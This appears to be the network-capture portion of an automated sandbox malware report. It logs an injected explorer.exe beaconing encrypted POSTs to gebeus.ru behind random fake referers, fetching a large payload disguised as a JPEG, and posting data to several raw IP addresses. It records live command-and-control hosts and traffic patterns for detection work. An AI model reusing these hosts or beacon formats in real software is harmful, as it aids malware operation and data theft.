                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:17:55.797616959 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://gaccdlqnuttqyggb.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 334
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:17:55.797616959 CEST | 334 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 39 3f d4 8c
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vu9?FVCXVwm({j1iB75SlmFIVI]?4?,2!1L"Q)A%|rG`?-e|a`c|DjaXC
                                              Jul 23, 2024 06:17:58.200817108 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:17:57 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              24 | 192.168.2.5 | 49753 | 211.202.224.10 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:18:04.859649897 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://hwyiclkccgwel.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 202
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:18:04.859673977 CEST | 202 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7c 27 fe ff
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vu|'plLRk_I0\3vjg}45XA^YwQ`9Ql O,Qj'3aZx-Z
                                              Jul 23, 2024 06:18:06.304620981 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:18:06 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              25 | 192.168.2.5 | 49754 | 211.202.224.10 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:18:10.418839931 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://ayjiiqvsdwkm.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 289
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:18:10.418840885 CEST | 289 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 31 03 d2 89
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vu1}*Po~y$oM:epxKE|[\U/ZODLB\X/~ytW*X :[I2CO-:~c"4~gyz.^]l
                                              Jul 23, 2024 06:18:11.844388008 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:18:11 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              26 | 192.168.2.5 | 49755 | 211.202.224.10 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:18:15.984659910 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://sisxkrjxvfhbylwf.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 195
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:18:15.984709024 CEST | 195 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 40 1c dd 90
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vu@tMrAd^6#r]^{o//HG&*[p<"<GI\b#+k'
                                              Jul 23, 2024 06:18:17.462402105 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:18:17 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              27 | 192.168.2.5 | 49756 | 211.202.224.10 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:18:21.934712887 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://ejjtkyjcscj.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 317
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:18:21.934712887 CEST | 317 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5c 31 c6 89
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vu\1~]uQ?Jr/6*0)~zg|>Z5@?LO(a}":@5?.\LD@HVO~ypqv\+[rW~QI
                                              Jul 23, 2024 06:18:23.369680882 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:18:23 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              28 | 192.168.2.5 | 49757 | 211.202.224.10 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:18:27.276273966 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://rkihnepnpjlak.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 296
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:18:27.276299000 CEST | 296 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3d 0a aa 99
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vu=~@iLXUKw3>"BIS?i-/??7Ne\|Z}M(Rwn07V(34n
                                              Jul 23, 2024 06:18:28.737255096 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:18:28 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              29 | 192.168.2.5 | 49758 | 211.202.224.10 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:18:32.931145906 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://yakfbjcglwus.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 321
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:18:32.931184053 CEST | 321 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 48 18 e9 f7
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vuHz!^xKOe;k8d|IRVK7ZPHDevsMd!sb79&V k@kI]uXo6?'
                                              Jul 23, 2024 06:18:34.351037025 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:18:34 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              30 | 192.168.2.5 | 49759 | 211.202.224.10 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:18:38.403007984 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://ahnkvlymtyox.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 159
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:18:38.403043032 CEST | 159 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 65 15 fc f6
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vueSSAg[zEU`A(02SgW*s_[R
                                              Jul 23, 2024 06:18:39.869865894 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:18:39 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              31 | 192.168.2.5 | 49760 | 211.202.224.10 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:18:44.150259972 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://scclxbagqps.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 252
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:18:44.150346994 CEST | 252 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 37 02 b1 8c
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vu7Tuy[y:`"I{h.`R'_<d.\]ALpB'a0_$2G^3B)+SBs37Aj"'GLXC!
                                              Jul 23, 2024 06:18:45.619739056 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:18:45 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              32 | 192.168.2.5 | 49763 | 211.202.224.10 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:18:49.752041101 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://ftpgvbtjlgwf.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 162
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:18:49.752130032 CEST | 162 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 57 0e c1 ff
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vuWeBwa(*O6X$,RGS+xmr=tn@KYLa8f
                                              Jul 23, 2024 06:18:51.831773043 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:18:50 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r
                                              Jul 23, 2024 06:18:51.832367897 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:18:50 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r
                                              Jul 23, 2024 06:18:51.833492994 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:18:50 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              33 | 192.168.2.5 | 49767 | 211.202.224.10 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:18:56.023133039 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://thvbfefxpihwuvsy.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 191
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:18:56.023153067 CEST | 191 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7e 15 d9 a8
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vu~V"q\*=Z$i-;n`kz\<WAo9#n{79aQ5<Vlcxp
                                              Jul 23, 2024 06:18:57.441621065 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:18:57 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              0 | 192.168.2.5 | 49731 | 185.149.100.242 | 443 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-23 04:16:25 UTC | 179 | OUT | GET /wp-content/images/pic1.jpg HTTP/1.1
                                              Connection: Keep-Alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Host: mussangroup.com
                                              2024-07-23 04:16:26 UTC | 452 | IN | HTTP/1.1 200 OK
                                              Connection: close
                                              cache-control: public, max-age=604800
                                              expires: Tue, 30 Jul 2024 04:16:25 GMT
                                              content-type: image/jpeg
                                              last-modified: Sun, 21 Jul 2024 13:21:40 GMT
                                              accept-ranges: bytes
                                              content-length: 11672576
                                              date: Tue, 23 Jul 2024 04:16:25 GMT
                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              1 | 192.168.2.5 | 49732 | 167.235.128.153 | 443 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-23 04:16:27 UTC | 234 | OUT | POST / HTTP/1.1
                                              Host: 167.235.128.153
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 8931
                                              2024-07-23 04:16:28 UTC | 137 | IN | HTTP/1.1 200 OK
                                              Content-Length: 733
                                              Date: Tue, 23 Jul 2024 04:16:28 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              2 | 192.168.2.5 | 49734 | 107.173.160.137 | 443 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-23 04:16:29 UTC | 236 | OUT | POST / HTTP/1.1
                                              Host: 107.173.160.137
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 155043
                                              2024-07-23 04:16:31 UTC | 137 | IN | HTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:16:31 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              3 | 192.168.2.5 | 49735 | 107.173.160.139 | 443 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-23 04:16:32 UTC | 234 | OUT | POST / HTTP/1.1
                                              Host: 107.173.160.139
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1288
                                              2024-07-23 04:16:33 UTC | 137 | IN | HTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:16:33 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              4 | 192.168.2.5 | 49736 | 167.235.128.153 | 443 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-23 04:16:34 UTC | 234 | OUT | POST / HTTP/1.1
                                              Host: 167.235.128.153
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1267
                                              2024-07-23 04:16:35 UTC | 137 | IN | HTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:16:35 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              5 | 192.168.2.5 | 49737 | 107.173.160.137 | 443 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-23 04:16:36 UTC | 234 | OUT | POST / HTTP/1.1
                                              Host: 107.173.160.137
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1267
                                              2024-07-23 04:16:42 UTC | 137 | IN | HTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:16:42 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              6 | 192.168.2.5 | 49738 | 107.173.160.139 | 443 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-23 04:16:43 UTC | 234 | OUT | POST / HTTP/1.1
                                              Host: 107.173.160.139
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1267
                                              2024-07-23 04:17:04 UTC | 137 | IN | HTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:17:04 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              7 | 192.168.2.5 | 49739 | 167.235.128.153 | 443 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-23 04:17:06 UTC | 234 | OUT | POST / HTTP/1.1
                                              Host: 167.235.128.153
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1267
                                              2024-07-23 04:17:06 UTC | 137 | IN | HTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:17:06 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              8 | 192.168.2.5 | 49740 | 107.173.160.137 | 443 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-23 04:17:07 UTC | 234 | OUT | POST / HTTP/1.1
                                              Host: 107.173.160.137
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1267
                                              2024-07-23 04:17:08 UTC | 137 | IN | HTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:17:08 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              9 | 192.168.2.5 | 49741 | 107.173.160.139 | 443 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-23 04:17:09 UTC | 234 | OUT | POST / HTTP/1.1
                                              Host: 107.173.160.139
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1122
                                              2024-07-23 04:17:11 UTC | 137 | IN | HTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:17:10 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              10 | 192.168.2.5 | 49742 | 167.235.128.153 | 443 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-23 04:17:11 UTC | 234 | OUT | POST / HTTP/1.1
                                              Host: 167.235.128.153
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1122
                                              2024-07-23 04:17:12 UTC | 137 | IN | HTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:17:12 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              11 | 192.168.2.5 | 49743 | 107.173.160.137 | 443 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-23 04:17:13 UTC | 234 | OUT | POST / HTTP/1.1
                                              Host: 107.173.160.137
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1122
                                              2024-07-23 04:17:19 UTC | 137 | IN | HTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:17:19 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              12 | 192.168.2.5 | 49744 | 107.173.160.139 | 443 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-23 04:17:20 UTC | 234 | OUT | POST / HTTP/1.1
                                              Host: 107.173.160.139
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1122
                                              2024-07-23 04:17:21 UTC | 137 | IN | HTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:17:21 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              13 | 192.168.2.5 | 49745 | 167.235.128.153 | 443 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-23 04:17:22 UTC | 234 | OUT | POST / HTTP/1.1
                                              Host: 167.235.128.153
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1122
                                              2024-07-23 04:17:23 UTC | 137 | IN | HTTP/1.1 200 OK
                                              Content-Length: 685
